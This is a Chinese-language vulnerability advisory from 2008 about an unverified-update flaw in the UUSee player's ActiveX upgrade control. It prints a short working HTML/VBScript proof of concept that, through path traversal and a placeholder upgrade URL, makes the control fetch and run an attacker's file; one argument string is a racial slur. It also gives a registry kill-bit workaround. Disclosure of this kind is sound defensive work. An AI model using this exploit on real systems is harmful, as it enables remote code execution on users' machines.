发布日期：2008-06-26
更新日期：2008-06-30

受影响系统：

悠视网 UUSee网络电视 2008

描述：

---

BUGTRAQ  ID: 29963

UUSee网络电视2008是悠视网提供的一款全新网络电视收看软件。

UUSee网络电视2008在安装的时候注册了几个ActiveX控件控件，其中一个控件用于升级UUSee。该控件clssid为：{2CACD7BB-1C59-4BBB-8E81-6E83F82C813B}，对应dll：C:\PROGRA~1\COMMON~1\uusee\UUUPGR~1.OCX。由于UUUpgrade.ocx没有对升级文件的来源进行验证，导致恶意攻击者可以通过构造伪造的升级文件导致UUSee网络电视下载攻击者指定的文件并运行。目前这个漏洞正在被名为Exploit.Win32.UuSee.gen的木马积极地利用。

<*来源：cnfuzzer （cnfuzzer@hotmail.com）
  
  链接：http://tieba.baidu.com/f?kz=411097036
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
cnfuzzer@hotmail.com
<object classid='clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B' id='target' ></object>
<script language='vbscript'>


arg1="/../../Program Files/Common Files/uusee/exp.ini"
arg2="http://127.0.0.1/UUUpgrade.ini"
arg3="MyNigga"
arg4=1

target.Update arg1 ,arg2 ,arg3 ,arg4

</script>

</html>

建议：

---

临时解决方法：

* 将下面内容保存为.reg文件并双击导入注册表：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{2CACD7BB-1C59-4BBB-8E81-6E83F82C813B}]
"Compatibility Flags"=dword:00000400

厂商补丁：

悠视网
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.uusee.com/download

浏览次数：3381
严重程度：0（网友投票）